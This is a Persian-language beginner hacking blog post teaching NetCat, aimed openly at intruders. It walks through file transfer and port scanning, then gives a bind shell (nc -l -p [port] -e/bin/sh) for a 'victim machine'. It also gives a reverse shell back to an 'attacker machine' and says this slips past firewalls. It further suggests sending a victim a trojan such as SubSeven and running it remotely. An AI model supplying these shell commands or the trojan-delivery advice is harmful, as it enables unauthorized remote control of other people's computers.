آموزشNetCat
ارسال شده توسط COMPUTER&NETWORK در 86/12/7:: 11:32 صبحنت کت یکی از محبوبترین و پرکابردترین برنامه ها توسط هکرها می باشدبرای همین از نت کت به عنوان چاقوی همه کاره هم یادمی شود.درصورت باز بودن یک پورت روی سیستم شما ، شخص مهاجم یا هکر به راحتی می تواند از طریق نت کت به آن نفوذ کند.
نت کت برنامه ای است که درعین سادگی و کم حجمی دربسیاری ازحملات نفوذی حتی در سطوح خیلی پیشرفته مورد استفاده هکران قرار می گیرد کاراصلی که این برنامه برای یک هکر انجام می دهد این است که data ها را برروی پورت های باز بین دو کامپیوتر انتقال می دهد.
نت کت اولین بار توسط Hobbit برای نسخه های مختلف یونیکس ازجمله Linux و ... نوشته شده ودرسال 1996 منتشرشده است و بالا خره دراواخر سال 1998، Weld pond نسخه ای برای ویندوز NT را اینجاد نمود.
یکی ازقابلیت های جالب این برنامه را میتوان به ارتباط ازپورتی به پورت دیگریاد کرد.
نکته : «این برنامه قابلیت ارتباط دوطرفه رو داراست - Listener و Clients - چه روی پورت TCP چه UDP»
خوب حالا قبل از شروع توضیحات درمورد دستورات باید با دو تا تعریف آشنا شوید.
سرویس گیرنده :
می تواندازطریق یک درگاه به کامپیوترموردنظر وصل شودو اطلاعاتی راازاین طریق ارسال کند.
سرویس دهنده :
هردرگاهی موردنظرشماباشدرابازکرده و منتظردریافت اطلاعات می شود.
NetCat برای انتقال اطلاعات :
یکی ازعامیانه ترین و ساده ترین امکاناتی که نت کت به شما می دهد انتقال فایلها می باشد.این برنامه قادر است یک فایل رابین دوکامپیوتربه راحتی منتقل کند.نت کت ازمفیدترین و سودمندترین ابزارها برای انتقال ، اطلاعات است . درصورتی که نت کت برروی یک کامپیوتربه صورت سرویس دهنده فعال باشد می توان ازطریق یک پورت ، اطلاعات را انتقال داد.
طرز انتقال اطلاعات :
nc -l -p 1234 >file
NC = اجرای برنامه
l- = حالت سرویس دهنده
p 1234- = شماره درگاه (پورت)
[File] = محل ذخیره داده هاارسالی
[fileِفایل] > nc [remot machine] 1234
NC - اجرای برنامه
[remot machin] = نام کامپیوتر هدف (آی پی)
1234 = شماره پورت مورد نظر
[file] = اطلاعات با این اسم استخراج می شه
نکته درمورد < : « درصورتی که این علامت اسم یک فایل باشد به عنوان دستگاه خروجی مشخص می شود واطلاعات دریافت شده درون آن قرار می گیرند،درصورتی که اینکارصورت نگیرد اطلاعات برروی صفحه نمایش نشان داده می شود. »
NetCat و پویش ها (یافتن پورت های باز اعم از UDP & TCP ) :
یکی از بهترین و پرکاربرد ترین توانایی این برنامه قدرتمند جستجو کردن و یافتن درگاه های بازبرروی کامپیوتر مورد نظر می باشد.این برنامه به صورت سریع و به راحتی با IP مورد نظر ارتباط برقرار می کند.
نکته : « این برنامه ازتکنیک پویش پورت ها به صورت Vanilla که یک استاندارد می باشد،پشتیبانی می کند. »
echo QUIT nc -v -w 3 targetmachine startport endport
QUIT = این چهار کاراکتر به هر پورت بازارسال می شود
NC = اجرای برنامه نت کت
v- = خروجی Verbose برای نشان دادن درگاه های باز برروی صفحه نمایش
w 3- = در3 ثانیه به هر جورت یک پیغام می فرستد و منتظرمی شه که این پیغام برگرده و معلوم بشه ان درگاه باز است یا بسته است
target machin = نام کامپیوتری(آی پی) که نت کت روی اون می خواهد اسکن بزنه
start port , end port = در اینجا شما تعیین می کنید که ازچه درگاهی تا چه درگاهی اسکن بزنه
NetCat و اینجاد ارتباط با یک درگاه باز و ارسال داده :
بعد از یافتن یک درگاه باز برروی کامپیوترهدف می توان ازاین برنامه جهت انتقال اطلاعات ( فایل ) استفاده کرد.
ارتباط و انتقال تحت درگاه های TCP :
nc remotemachine portnumber
NC = اجرای برنامه روی کامپیوتر مبدا
rempotemachine = نام کامپیوتر (آی پی)
portnumber = درگاه باز
ارتباط و انتقال تحت درگاه های UDP :
nc -u remotemachine portnumber
NC = اجرای برنامه
u- = انتخاب پروتکل ارتباطی UDP
remotemachine = نام کامپیوتر(آی پی) هدف
portnumber = درگاه باز
NetCat و اجرای دستورات ازطریق خط فرمان :
یکی ازقابلیت های بسیار عالی که به درد نفوذگر می خوره این هست که می تونه یک فایل یا ... از راه دور اجرا کنه . (برای مثال شما یک تروجان مثل ساب سون رو برای کامپیوتر هدف می فرستید و بعد هم اجراش می کنید)
«کیف کردید نه ؟؟؟؟ »
nc -l -p [port] -e/bin/sh
nc = اجرای برنامه نت کت
l- = حالت سرویس دهنده
p port- = شماره درگاه مورد نظربرای ارتباط
e/bin/sh- = آدرس برنامه ای که بعد از برقراری ارتباط باید اجرا بشه.
nc victimmachine portnumber
nc = اجرای برنامه
victimmachine = آدرس آی پی ماشین قربانی
portnumber = شماره پورت مورد نظر برای برقراری ارتباط ازطریق پروتکل TCP
دراین حالت نت کت برروی کامپیوتر قربانی درحالت انتظار باقی می ماندتانفوذگرشروع به ارسال کند.
NetCat و ایجاد نفوذ برروی کامپیوترموردنظردرحالت فعال :
nc [attacker machine] [port] -e/bin/sh
nc = اجرای برنامه
attacker machine = آدرس آی پی کامپیوتر نفوذگر
port = شماره درگاه مورد نظر
e/bin/sh- = نام فایلی که بعد از اینجاد ارتباط ، اجرا خواهد شد.
nc -l -p port
nc = اجرای برنامه
l- = حالت سرویس دهنده
p port- = شماره پورت مورد نظر
با کمک این روش شما می توانید ازدیوار آتش به راحتی عبور کنید. به این دلیل که دیوار آتش سعی می کنه که ازورود اطلاعات از بیرون به داخل جلوگیری کنه ولی برعکس این موضوع رو به درستی پوشش نمی ده!
تذکر: تمام علامت های [ ] که درمتن بالا به کا برده شده در فرمول وجود ندارد و فقط برای تفکیک بهتر نوشته هاست.
جوابیه : دوستان فرموده بودند که تاریخ آپ بعدی رو براشون اعلام کنم راستش این برای من امکان نداره ولی قول میدم هفته ای 2 - 3 تا آپ کنم . بازم پرسیده بودند که آیا این آموزش هایی که من میدم رو باید تو لینکس یا 2000 حتما انجام داد که جواب ایشون اینه که چون سطح این آموزش ها فعلا مبتدی می باشد نیازی به لینکس نیست و همون ویندوز رو استفاده کنید ولی به جای ایکس پی بهتره با 2000 کار کنید که راه بیوفتید .
خوب دوستان اینم از این آموزش از اینکه خیلی دیر آپ کردم منو ببخشید ولی خداییش خیلی کار داشتم که همش نا تماموم مونده بود ولی قول میدم که آپ بعدی خیلی زود باشه ولی تا من نظرات شما را نبینم و مطمئن نشم که کسی داره از این مطالب استفاده میکنه آپ نمی کنم پس حتما یک نظر بدید حتی یک کلمه ممنون فعلا بای تا های.